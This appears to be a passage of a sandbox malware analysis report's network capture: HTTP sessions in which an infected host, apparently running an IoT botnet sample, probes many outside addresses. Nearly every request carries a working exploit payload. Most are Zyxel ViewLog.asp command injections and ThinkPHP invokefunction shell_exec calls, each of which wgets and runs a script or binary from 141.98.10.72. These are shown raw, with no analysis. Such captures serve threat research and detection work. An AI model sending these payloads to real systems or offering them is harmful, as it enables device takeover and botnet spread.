                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:11.097443104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:32.342509031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:13.296938896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            435192.168.2.235456662.78.50.478080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:51.624831915 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:51.861490011 CET449INHTTP/1.1 401 Unauthorized
                                                            Date: Wed, 14 Feb 2024 08:28:50 GMT
                                                            Server: Boa/0.94.14rc21
                                                            Accept-Ranges: bytes
                                                            Content-encoding: gzip
                                                            Connection: close
                                                            WWW-Authenticate: Basic realm="WF2419E_RU"
                                                            user"
                                                            Content-Type: text/html; charset=ISO-8859-1
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 67 65 74 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 66 72 6f 6d 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY><H1>401 Unauthorized</H1>Your client does not have permission to get URL /cgi-bin/ViewLog.asp from this server.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            436192.168.2.235955262.162.115.798080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:51.631705999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            437192.168.2.235809662.29.90.1738080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:51.639755964 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            438192.168.2.233767695.86.114.1588080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:51.643908024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            439192.168.2.235372094.123.97.1988080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:51.885916948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            440192.168.2.233756085.253.71.1958080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:52.094835997 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            441192.168.2.234879494.120.55.738080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:52.110398054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            442192.168.2.234021085.216.23.108080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:52.156500101 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:52.474689960 CET36INHTTP/1.1 404 Not Found


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            443192.168.2.235583888.221.204.5280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:52.970444918 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:53.184253931 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:28:53 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:53 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 64 62 35 33 65 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 33 33 26 23 34 36 3b 38 30 34 31 36 33 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;8db53e17&#46;1707899333&#46;804163f</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            444192.168.2.235032488.193.231.12380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:52.972107887 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:53.243715048 CET29INHTTP/1.0 200 OK
                                                            Feb 14, 2024 09:28:53.248647928 CET517INData Raw: 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 30 2e 35 0d 0a 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43
                                                            Data Ascii: Content-type: text/htmlX-Powered-By: PHP/5.0.5<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="refresh" content="0; URL=login.php" />


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            445192.168.2.235922288.99.253.24780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:53.175061941 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:53.379725933 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 14 Feb 2024 08:28:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            446192.168.2.235580888.170.210.21880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:53.175369024 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:53.380037069 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            447192.168.2.233294488.195.136.19480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:53.179771900 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            448192.168.2.233414288.209.228.21580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:53.188656092 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:53.406888008 CET295INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            449192.168.2.235226888.15.81.17980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:53.395085096 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:53.615993977 CET49INData Raw: 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e
                                                            Data Ascii: <body><h1>400 Bad request</h1></body>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            450192.168.2.235034088.193.231.12380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:53.406641960 CET502INData Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 2f 62 68 6f 63 20 32 33 73 65 70 32 30 30 34 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 37 20 4a 61 6e 20
                                                            Data Ascii: (null) 400 Bad RequestServer: mini_httpd/1.19/bhoc 23sep2004Date: Wed, 07 Jan 1970 00:23:47 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=UTF-8Connection: close<HTML><HEAD><TITLE>400 Bad Request</TITLE></HE


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            451192.168.2.233516488.130.182.12880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:53.421997070 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:53.667040110 CET309INHTTP/1.1 400 Bad Request
                                                            Server: noindex
                                                            Date: Wed, 14 Feb 2024 08:28:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            452192.168.2.235512031.136.196.498080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:54.696017027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:55.323637009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:56.603451014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:59.323127985 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:04.442385912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
